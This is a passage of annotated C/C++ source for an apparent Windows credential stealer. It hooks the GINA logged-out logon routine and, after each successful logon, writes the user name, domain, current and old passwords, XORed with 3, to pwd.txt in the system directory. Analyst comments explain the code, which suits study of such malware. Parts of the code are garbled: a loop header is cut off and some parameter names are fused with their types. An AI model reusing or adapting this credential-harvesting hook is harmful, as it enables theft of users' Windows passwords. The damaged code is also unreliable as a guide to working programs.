/r/nPassWord = %s /r/nOldPass = %s/r/n" ,
        pNprNotifyInfo->pszUserName ,
        pNprNotifyInfo->pszDomain ,
        pNprNotifyInfo->pszPassword,
        pNprNotifyInfo->pszOldPassword );
        // NOTE(review): the enclosing function starts before this excerpt. The
        // statement above is the tail of a formatting call; the visible arguments
        // are the user name, domain, password and old-password fields of
        // pNprNotifyInfo. The "/r/n" sequences are reproduced as found; they look
        // like damaged line-break escapes — TODO confirm against the original file.

        // Convert the wide-character record in pWBuffer into pBuffer.
        WideToByte( pBuffer , pWBuffer , lstrlenW( pWBuffer ) );
    }

    // Build the output path: <directory returned by GetSystemDirectory> + "//pwd.txt".
    // Analyst note: a file named pwd.txt in the Windows system directory is the
    // on-disk artifact this code leaves behind.
    char LogPath[MAX_PATH] = {0};
    GetSystemDirectory( LogPath , MAX_PATH);
    lstrcat( LogPath , "//pwd.txt");

    // OPEN_ALWAYS opens the file if it exists and creates it otherwise, so records
    // from successive calls accumulate in the same file.
    HANDLE hfile = CreateFile( LogPath , GENERIC_WRITE , FILE_SHARE_WRITE , 0 , OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL , 0 );
    if (hfile != INVALID_HANDLE_VALUE)
    {
        unsigned long ret;      // receives the byte count reported by WriteFile
        // Position the file pointer one byte before the end of the file.
        SetFilePointer( hfile , -1 , 0 , FILE_END);
        int i=0;
        SYSTEMTIME st;          // not used in the visible part of this function
        int b;                  // not used in the visible part of this function
        // NOTE(review): the loop header below is incomplete in this listing (the
        // condition and increment are missing); it is kept exactly as found.
        for(;i {
            pBuffer[i] = pBuffer[i] ^ 3; // author's comment: "encryption uses XOR". A fixed one-byte XOR is reversible obfuscation, so the file contents are equivalent to cleartext credentials.
        }
        WriteFile( hfile , pBuffer , lstrlen( pBuffer ) , &ret , 0 );
        CloseHandle( hfile );
    }
    // Both buffers are released with GlobalFree; their allocation is not visible here.
    GlobalFree( pWBuffer );
    GlobalFree( pBuffer );
    return;
}

/*
 * Formats the current local time into pBuffer.
 *
 * pBuffer is not declared in this function; it is presumably defined elsewhere
 * in the file — TODO confirm. The local `ret` is initialised but never used.
 */
void WriteCurrentTime()
{
    SYSTEMTIME st;
    DWORD ret = 0;
    GetLocalTime(&st);
    wsprintf( pBuffer , "/r/n%d/%d/%d/%d:%d:%d" , st.wYear , st.wMonth , st.wDay , st.wHour , st.wMinute, st.wSecond );
}

/*
 * Converts a wide-character string to the ANSI code page (CP_ACP).
 *
 * sz_target  destination byte buffer
 * sz_source  source wide string; the length argument passed on is -1, so the
 *            source is treated as null-terminated
 * size_ansi  passed to WideCharToMultiByte as the destination size in bytes
 *
 * Returns whatever WideCharToMultiByte returns.
 */
int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi)
{
    return WideCharToMultiByte( CP_ACP , WC_COMPOSITECHECK , sz_source , -1 , sz_target , size_ansi , 0 , 0 );
}

/*
 * Replacement routine that runs in place of the hooked logon callback.
 *
 * It removes the hook, forwards all arguments to the routine stored in
 * hooktable.OldDDR (presumably the saved original entry point — TODO confirm),
 * and, when that call returns WLX_SAS_ACTION_LOGON, passes pNprNotifyInfo to
 * WriteLog. The forwarded call's return value is returned unchanged.
 *
 * NOTE(review): the parameter list resembles WlxLoggedOutSAS from the GINA
 * logon interface, which matches the UnHookWlxLoggedOutSAS helper name. Two
 * parameters appear with type and name fused ("PSIDpLogonSid",
 * "PWLX_MPR_NOTIFY_INFOpNprNotifyInfo"); this looks like extraction damage and
 * is kept exactly as found.
 *
 * Analyst note: the hook is removed on entry and nothing in this function
 * re-installs it, so whether interception persists across logons cannot be
 * determined from this excerpt.
 */
int WINAPI FunNewADDR( PVOID pWlxContext, DWORD dwSasType, PLUID pAuthenticationId, PSIDpLogonSid, PDWORD pdwOptions, PHANDLE phToken, PWLX_MPR_NOTIFY_INFOpNprNotifyInfo, PVOID * pProfile )
{
    UnHookWlxLoggedOutSAS(); // author's comment: when the system jumps to our own function, remove the hook first
    int i = hooktable.OldDDR(pWlxContext , dwSasType , pAuthenticationId , pLogonSid , pdwOptions , phToken , pNprNotifyInfo, pProfile );
    if (i == WLX_SAS_ACTION_LOGON ) // only this return value leads to a WriteLog call
    {
        WriteLog( pNprNotifyInfo );
    }
    return i;
}

/*
 * Exported with C linkage; the body does nothing. Its purpose is not visible
 * in this excerpt.
 */
extern "C" __declspec(dllexport) void start()
{
    return;
}